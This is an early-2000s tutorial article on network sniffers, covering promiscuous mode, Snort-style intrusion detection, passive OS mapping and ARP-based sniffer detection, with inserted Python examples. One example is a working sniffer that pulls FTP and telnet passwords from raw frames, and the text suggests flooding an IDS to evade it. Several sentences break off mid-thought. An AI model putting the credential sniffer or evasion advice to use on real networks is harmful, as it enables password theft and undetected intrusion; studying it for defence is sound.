Copyright © 2001,2002 eyeonsecurity Inc., All Rights Reserved. No portions of eyeonsecurity may be used without express, written permission.

Sniffers - Their (ab)use in Networks.
- Obscure^, Eye on Security
I am writing this after an overdose of MediNight (which, in case you don't know, is the medicine of choice w/ alcohol, and alcohol is evil), so please understand that my mental health is not at its best.
This text is about sniffers, their good and evil uses, which I hope you will find useful and easy to comprehend. Please note that this is not intended for the network experts out there, i.e. nothing new is said. However, it assumes you're familiar with certain TCP/IP terms.
Definition of a sniffer.
In networking terms, a sniffer is a machine whose network interface card is set to promiscuous mode, so that it watches every packet that reaches it on its network segment. In normal mode a network card accepts only the frames addressed to its own MAC address (plus broadcasts and the multicast groups the host has joined) and silently drops the rest in hardware. In promiscuous mode it accepts every frame and passes it up to the OS. Note that this only gives you what the wire delivers to that port: on a shared medium (a hub) that is every packet on the segment, but a switch forwards unicast traffic only to the port of the destination host, so on a switched network a promiscuous card sees other hosts' traffic only if the switch floods it, the port is mirrored, or the attacker tricks the switch or the hosts into sending it to him (e.g. with ARP spoofing). Promiscuous mode is useful for monitoring a network, detecting malicious packets, capturing passwords, and much more. In fact, a sniffer is used by crackers, hackers, and by security professionals for different
NIDS = Network Intrusion Detection System. This consists of a program which sets the network card in promiscuous mode and checks for interesting packets. It will check for hacker attacks such as NT Null Sessions, failed TELNET authentication and even PINGs, amongst others. One such free tool for Linux (and now even WinNT/2k) is Snort. Snort is given a list of patterns (rules) it should check for, and it logs matches and alerts the user/administrator. NIDS are there to accompany firewalls, as firewalls, like any other software, have limitations and can be circumvented. Thus once an attacker has got past the firewall, if he does anything which produces a pattern defined in the Intrusion Detection System, he will probably face some new problems :)
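To make the "list of patterns" concrete, here is an added example, written for this article and not Snort's own code: a toy rule engine that understands a small subset of Snort's rule syntax (the header, msg, content with |hex| escapes, itype and sid) and runs it over a few constructed packets: a failed telnet login, a simplified NT null-session tree connect to IPC$ (the content string is a stand-in for the real SMB signature, not Snort's shipped rule) and an ICMP echo request. The network variables, rules, SIDs and packets are all made up, and packets arrive already decoded as dicts; a real NIDS decodes the raw frames it reads off the promiscuous interface first.

```python
"""Snort-style signature matching over decoded packets (added example, toy engine)."""
import ipaddress
import re

# Rule variables, as in snort.conf (constructed values).
VARS = {"$HOME_NET": "10.0.0.0/24", "$EXTERNAL_NET": "any"}

HEADER_RE = re.compile(
    r"^(alert|log)\s+(tcp|udp|icmp|ip)\s+(\S+)\s+(\S+)\s+->\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$")
OPTION_RE = re.compile(r'(\w+)\s*:\s*"?([^";]*)"?\s*;')
HEX_RE = re.compile(r"\|([0-9A-Fa-f\s]+)\|")


def content_bytes(text):
    """Snort content syntax to bytes: '|5c|IPC$|00|' becomes backslash, IPC$, NUL."""
    out, pos = b"", 0
    for m in HEX_RE.finditer(text):
        out += text[pos:m.start()].encode("latin-1") + bytes.fromhex(m.group(1))
        pos = m.end()
    return out + text[pos:].encode("latin-1")


def parse_rule(line):
    """Parse 'alert proto src sport -> dst dport (options;)' into a dict."""
    m = HEADER_RE.match(line)
    if not m:
        raise ValueError("unparsable rule: " + line)
    action, proto, src, sport, dst, dport, opts = m.groups()
    options = dict(OPTION_RE.findall(opts))
    return {
        "action": action, "proto": proto,
        "src": VARS.get(src, src), "sport": sport,
        "dst": VARS.get(dst, dst), "dport": dport,
        "msg": options.get("msg", ""),
        "content": content_bytes(options["content"]) if "content" in options else None,
        "itype": int(options["itype"]) if "itype" in options else None,
        "sid": int(options.get("sid", 0)),
    }


def addr_matches(spec, ip):
    """'any', a CIDR block, or a '!'-negated CIDR block."""
    if spec == "any":
        return True
    negate = spec.startswith("!")
    net = ipaddress.ip_network(spec.lstrip("!"), strict=False)
    return (ipaddress.ip_address(ip) in net) != negate


def port_matches(spec, port):
    """'any', a single port, or a Snort range such as 1:1023."""
    if spec == "any":
        return True
    if ":" in spec:
        lo, hi = spec.split(":")
        return int(lo or 0) <= port <= int(hi or 65535)
    return int(spec) == port


def rule_matches(rule, pkt):
    if rule["proto"] not in ("ip", pkt["proto"]):
        return False
    if not (addr_matches(rule["src"], pkt["src"]) and addr_matches(rule["dst"], pkt["dst"])):
        return False
    if pkt["proto"] in ("tcp", "udp") and not (
            port_matches(rule["sport"], pkt["sport"]) and port_matches(rule["dport"], pkt["dport"])):
        return False
    if rule["itype"] is not None and pkt.get("itype") != rule["itype"]:
        return False
    if rule["content"] is not None and rule["content"] not in pkt.get("payload", b""):
        return False
    return True


def run_nids(rules, packets):
    """Return (sid, msg) pairs in packet order, like lines in Snort's alert file."""
    return [(r["sid"], r["msg"]) for p in packets for r in rules if rule_matches(r, p)]


RULES = [parse_rule(r) for r in (  # constructed rules, not Snort's rule set
    'alert tcp any 23 -> $HOME_NET any (msg:"TELNET login failed"; content:"Login incorrect"; sid:1000001;)',
    'alert tcp any any -> $HOME_NET 139 (msg:"NETBIOS NT NULL session"; content:"|5c|IPC$|00|"; sid:1000002;)',
    'alert icmp any any -> $HOME_NET any (msg:"ICMP PING"; itype:8; sid:1000003;)',
)]

PACKETS = [  # constructed, already-decoded packets
    {"proto": "tcp", "src": "10.0.0.1", "sport": 23, "dst": "10.0.0.5", "dport": 1040,
     "payload": b"\r\nLogin incorrect\r\nlogin: "},
    {"proto": "tcp", "src": "192.168.1.9", "sport": 1025, "dst": "10.0.0.2", "dport": 139,
     "payload": b"\xffSMBu" + b"\x00" * 20 + b"\\\\SERVER\\IPC$\x00IPC\x00"},
    {"proto": "icmp", "src": "192.168.1.9", "dst": "10.0.0.2", "itype": 8, "payload": b"abcdefgh"},
    {"proto": "tcp", "src": "10.0.0.5", "sport": 1041, "dst": "10.0.0.1", "dport": 80,
     "payload": b"GET / HTTP/1.0\r\n\r\n"},
]

if __name__ == "__main__":
    for sid, msg in run_nids(RULES, PACKETS):
        print("[**] [1:%d] %s" % (sid, msg))
```

The HTTP request produces no alert, which is the point of signature-based detection: only traffic matching a known pattern is reported, so an attacker who avoids the patterns (or exhausts the sensor, as discussed at the end of this text) goes unnoticed.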
Sniffing is also used by employers wishing to watch over whatever their employees do, or by school administrators watching over their students' use of the Internet (or vice-versa, that would be interesting). Thus they will know whether you're watching porn from school or not. One such product for WinNT is Languard, which shows you all the connections other machines on the same network segment are making. It also allows the administrator running Languard to filter certain sites, keywords, or protocols. With the recent controversial FBI Carnivore software, which monitors e-mail, tracks a suspect's IP address and basically sniffs all of the suspect's data, we also got an alternative implementation of the evil software: Antivore.
Password Sniffing and other malicious uses.
Sniffing passwords is probably what you're after. This basically consists of capturing only the first few bytes of every telnet, ftp (or whatever clear-text protocol) session, since that is where the login name and password travel. A huge number of programs exist to do this for all platforms. Dsniff (available for Linux and WinNT) does this and more. It even allows you to follow another user on the network and browse websites as he does so in real time. Sniffers can be a real headache for the (maybe lazy) system administrator, as once just one machine on a network is compromised, all data going in and out of that network segment can be captured. Thus e-mail, clear-text passwords (such as telnet or ftp), NetBIOS, and much more can be compromised easily.
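Here is what "capturing the first few bytes of every session" looks like in code, as an added example for this article (it is not dsniff's code). It decodes raw Ethernet/IPv4/TCP frames, keeps only the first 256 bytes of client-to-server data for each session to port 21 or 23, and pulls the FTP USER/PASS commands out of them; for telnet, where the login is typed one keystroke per packet, it simply keeps the bytes as they arrived. The frames below are constructed by hand with zero checksums so the script runs offline; to use it for real you would feed it frames read from a promiscuous raw socket or a pcap file. It assumes Ethernet II framing with no VLAN tag and no IP fragmentation.

```python
"""Capture clear-text FTP/telnet credentials from raw frames (added example)."""
import struct

ETH_HDR_LEN = 14
ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6
CLEAR_TEXT_PORTS = {21: "ftp", 23: "telnet"}


def decode_frame(frame):
    """Return (src_ip, dst_ip, sport, dport, tcp_payload), or None if not TCP over IPv4."""
    if len(frame) < ETH_HDR_LEN or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[ETH_HDR_LEN:]
    if len(ip) < 20:
        return None
    ihl = (ip[0] & 0x0F) * 4                       # IP header length in bytes
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != PROTO_TCP or len(ip) < ihl + 20:
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]                        # drop Ethernet padding, if any
    sport, dport = struct.unpack("!HH", tcp[0:4])
    data_offset = (tcp[12] >> 4) * 4               # TCP header length in bytes
    return src, dst, sport, dport, tcp[data_offset:]


def sniff_credentials(frames, max_bytes=256):
    """Keep the first max_bytes of client->server data per clear-text session,
    then extract FTP USER/PASS; telnet keystrokes are kept raw (Enter = CR NUL)."""
    sessions = {}
    for frame in frames:
        decoded = decode_frame(frame)
        if decoded is None:
            continue
        src, dst, sport, dport, payload = decoded
        if dport not in CLEAR_TEXT_PORTS or not payload:
            continue
        key = (src, sport, dst, dport)
        buf = sessions.setdefault(key, b"")
        if len(buf) < max_bytes:
            sessions[key] = buf + payload[:max_bytes - len(buf)]
    found = []
    for (src, sport, dst, dport), buf in sessions.items():
        creds = {"service": CLEAR_TEXT_PORTS[dport], "client": src, "server": dst}
        if dport == 21:
            for line in buf.split(b"\r\n"):
                cmd, _, arg = line.partition(b" ")
                if cmd.upper() == b"USER":
                    creds["user"] = arg.decode("ascii", "replace")
                elif cmd.upper() == b"PASS":
                    creds["password"] = arg.decode("ascii", "replace")
        else:
            creds["typed"] = buf.replace(b"\r\x00", b"\n").decode("ascii", "replace")
        found.append(creds)
    return found


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame for test input (constructed, checksums zero)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("005056aabbcc") + struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, PROTO_TCP, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp


TELNET_KEYSTROKES = (b"b", b"o", b"b", b"\r\x00", b"h", b"unter2", b"\r\x00")  # constructed
SAMPLE_FRAMES = [  # constructed: one FTP login, one HTTP request (ignored), one telnet login
    build_frame("10.0.0.5", "10.0.0.1", 1040, 21, b"USER alice\r\n"),
    build_frame("10.0.0.1", "10.0.0.5", 21, 1040, b"331 Password required for alice.\r\n"),
    build_frame("10.0.0.5", "10.0.0.1", 1040, 21, b"PASS s3cret\r\n"),
    build_frame("10.0.0.5", "10.0.0.1", 1041, 80, b"GET / HTTP/1.0\r\n\r\n"),
]
SAMPLE_FRAMES += [build_frame("10.0.0.7", "10.0.0.1", 1042, 23, key) for key in TELNET_KEYSTROKES]

if __name__ == "__main__":
    for creds in sniff_credentials(SAMPLE_FRAMES):
        print(creds)
```

Keeping only the first bytes of each session is what lets a password sniffer run cheaply for days on a busy network; everything after the login is discarded before it is even looked at.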
TCPDump used to be, and probably still is, the sniffer of choice. It allows the user to dump all network data in its raw format. It is usually used to check on certain connections, what data is passing on a certain protocol, and other general use. I personally use Snort for general use (besides using it as an IDS), as by default it decodes the packet data. Other sniffers (network protocol analyzers) are Ethereal (for Linux/UNIX, a port also available for WinNT) and eEye's IRIS (a commercial product). These two are easy-to-use sniffers and will help you learn a lot about your network traffic. WinNT Server also comes with its own built-in sniffer: Network Monitor.
A relatively "new" use of sniffers is passive network mapping and OS detection: the sniffer never sends a packet, it only infers live hosts, open ports and operating systems from the traffic it sees, so there is nothing for an IDS to notice. A good product which does this (available for Linux and Windows platforms) is Siphon 0.666.
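As an added example of the idea (written for this article, not Siphon's code), the block below builds a host map from packets that have already been decoded to their header fields, without sending anything: every source address seen is a live host, a SYN/ACK leaving a port means that port is listening, and the TTL and TCP window of a SYN hint at the operating system. Rounding the observed TTL up to the nearest common starting value also tells you how many routers away the host is, and when that is more than zero the source MAC you saw belongs to the router, not the host. The packets and the three-entry fingerprint table are constructed for illustration; treat the OS names as assumptions rather than Siphon's database.

```python
"""Passive network mapping and OS guessing from sniffed packets (added example)."""

# (initial TTL, TCP window seen in the SYN) -> OS guess. Illustrative values only.
FINGERPRINTS = {
    (64, 5840): "Linux 2.4",
    (128, 8192): "Windows NT/2000",
    (64, 16384): "FreeBSD/OpenBSD",
}
COMMON_INITIAL_TTLS = (32, 64, 128, 255)


def initial_ttl(observed_ttl):
    """Round an observed TTL up to the nearest common starting value; the
    difference between the two is how many routers the packet crossed."""
    for start in COMMON_INITIAL_TTLS:
        if observed_ttl <= start:
            return start
    return observed_ttl


def guess_os(ttl, window):
    return FINGERPRINTS.get((initial_ttl(ttl), window), "unknown")


def map_network(packets):
    """Return {ip: {"mac", "listening", "os", "hops", "peers"}} built from traffic alone."""
    hosts = {}
    for p in packets:
        h = hosts.setdefault(p["src"], {
            "mac": p["src_mac"], "listening": set(), "os": "unknown",
            "hops": None, "peers": set()})
        h["peers"].add(p["dst"])
        if p["proto"] != "tcp":
            continue
        if "S" in p["flags"]:          # SYN or SYN/ACK: fingerprint the TCP stack
            h["os"] = guess_os(p["ttl"], p["window"])
            h["hops"] = initial_ttl(p["ttl"]) - p["ttl"]
        if p["flags"] == "SA":         # the server answered, so the port is open
            h["listening"].add(p["sport"])
    return hosts


def tcp(src, src_mac, sport, dst, dport, flags, ttl, window):
    """Helper to write constructed, already-decoded TCP packets compactly."""
    return {"proto": "tcp", "src": src, "src_mac": src_mac, "sport": sport,
            "dst": dst, "dport": dport, "flags": flags, "ttl": ttl, "window": window}


ROUTER_MAC = "00:0c:29:12:34:56"  # constructed: the gateway of 10.0.0.0/24
PACKETS = [  # constructed sample traffic as seen from a sniffer on 10.0.0.0/24
    tcp("10.0.0.5", "00:11:22:33:44:55", 1040, "10.0.0.1", 21, "S", 128, 8192),
    tcp("10.0.0.1", "00:50:56:aa:bb:cc", 21, "10.0.0.5", 1040, "SA", 64, 5840),
    tcp("10.0.0.5", "00:11:22:33:44:55", 1040, "10.0.0.1", 21, "A", 128, 8760),
    # one hop away: the frame arrives with the router's MAC and a decremented TTL
    tcp("172.16.3.9", ROUTER_MAC, 2000, "10.0.0.1", 80, "S", 63, 16384),
    tcp("10.0.0.1", "00:50:56:aa:bb:cc", 80, "172.16.3.9", 2000, "SA", 64, 5840),
    {"proto": "icmp", "src": "10.0.0.1", "src_mac": "00:50:56:aa:bb:cc", "dst": "10.0.0.5"},
]

if __name__ == "__main__":
    for ip, info in sorted(map_network(PACKETS).items()):
        print(ip, info)
```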
If you want to be sure that no sniffers are running on your network, there actually is software which checks for this. AntiSniff by L0pht comes to mind. Other software which I know that checks for this are Sentinel (for Linux) and Languard. Note that these tools can only detect the side effects of promiscuous mode (extra latency under load, reverse DNS lookups of sniffed addresses, replies to frames the host should never have seen), so a quiet sniffer on a box with no IP address configured will slip past them. One of the ways these work is by sending Machine A an ARP request for its own IP address inside an Ethernet frame whose destination MAC address belongs to no real machine B (a made-up address rather than the broadcast address). A card in normal mode drops that frame before the OS ever sees it, but if Machine A is capturing all packets (i.e. its card is in promiscuous mode), the frame reaches the OS, whose ARP code only looks at the target IP address, so it should respond to this packet, when it's not supposed
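The block below is an added example for this article that simulates the ARP test just described; it is not AntiSniff's, Sentinel's or Languard's code, it never touches a real network, and all addresses are constructed. It also makes the earlier definition of promiscuous mode concrete, since the whole trick rests on the fact that the card, not the OS, decides which frames the OS gets to see. Which bogus destination address works best depends on how the target OS classifies "broadcast"; ff:ff:ff:ff:ff:fe is used here as an assumption, not as the address any particular tool sends.

```python
"""Why a bogus-destination ARP request exposes a promiscuous host (added example)."""
import struct

BROADCAST = bytes.fromhex("ffffffffffff")
ETHERTYPE_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa

# Constructed addresses: Machine A (the suspect) and the machine running the test.
MACHINE_A_MAC = bytes.fromhex("001122334455")
MACHINE_A_IP = bytes([10, 0, 0, 5])
PROBE_MAC = bytes.fromhex("005056aabbcc")
PROBE_IP = bytes([10, 0, 0, 1])


def nic_accepts(dst_mac, nic_mac, promiscuous, joined_multicast=frozenset()):
    """The card's hardware address filter. Normal mode passes frames to its own
    MAC, to the broadcast address and to multicast groups the host joined;
    promiscuous mode passes everything."""
    if promiscuous:
        return True
    if dst_mac == nic_mac or dst_mac == BROADCAST:
        return True
    is_group_address = bool(dst_mac[0] & 1)
    return is_group_address and dst_mac in joined_multicast


def build_arp_request(src_mac, src_ip, target_ip, eth_dst):
    """ARP who-has target_ip. eth_dst is normally the broadcast address;
    the sniffer test deliberately uses a MAC that no card owns."""
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, 1, src_mac, src_ip, bytes(6), target_ip)
    return eth_dst + src_mac + struct.pack("!H", ETHERTYPE_ARP) + arp


def host_handles_frame(frame, host_mac, host_ip, promiscuous):
    """What Machine A does with a frame: returns its ARP reply frame, or None."""
    eth_dst, ethertype = frame[0:6], struct.unpack("!H", frame[12:14])[0]
    if not nic_accepts(eth_dst, host_mac, promiscuous):
        return None                      # dropped by the card; the OS never sees it
    if ethertype != ETHERTYPE_ARP:
        return None
    _, _, _, _, oper, sha, spa, _, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if oper != 1 or tpa != host_ip:
        return None
    # The ARP code keys on the target IP and ignores the Ethernet destination, so a
    # request that only got in because the card is promiscuous is still answered.
    reply = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, 2, host_mac, host_ip, sha, spa)
    return sha + host_mac + struct.pack("!H", ETHERTYPE_ARP) + reply


def probe_for_sniffer(target_mac, target_ip, target_promiscuous,
                      probe_mac=PROBE_MAC, probe_ip=PROBE_IP):
    """Simulated test: True means the target answered a frame it should not have seen."""
    bogus_dst = bytes.fromhex("fffffffffffe")  # assumption: one common bogus address
    frame = build_arp_request(probe_mac, probe_ip, target_ip, bogus_dst)
    return host_handles_frame(frame, target_mac, target_ip, target_promiscuous) is not None


if __name__ == "__main__":
    for mode in (False, True):
        print("promiscuous=%s -> replied to bogus-destination ARP: %s"
              % (mode, probe_for_sniffer(MACHINE_A_MAC, MACHINE_A_IP, mode)))
    control = build_arp_request(PROBE_MAC, PROBE_IP, MACHINE_A_IP, BROADCAST)
    print("control (broadcast ARP, normal mode) answered:",
          host_handles_frame(control, MACHINE_A_MAC, MACHINE_A_IP, False) is not None)
```

The control case matters when you run such a test for real: a host that does not answer the normal broadcast ARP either (firewalled, down, or not on this segment) tells you nothing, so only a reply to the bogus frame after a reply to the broadcast frame is evidence of promiscuous mode.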
Other than that, it is recommended that network administrators use encryption on their networks, thus making sniffing (maybe by inside users, i.e. employees wishing to blackmail their boss, for example >:) more or less useless. Thus for instance, instead of using TELNET, use Secure Shell (SSH). Keep in mind that encryption hides the contents, not the fact that two machines are talking: who connects to whom, when, and how much is still visible to the sniffer.
If you actually want to attack a sniffer, say one which is running as an IDS or monitor, you can simply flood it with packets. A port scan should in theory break up most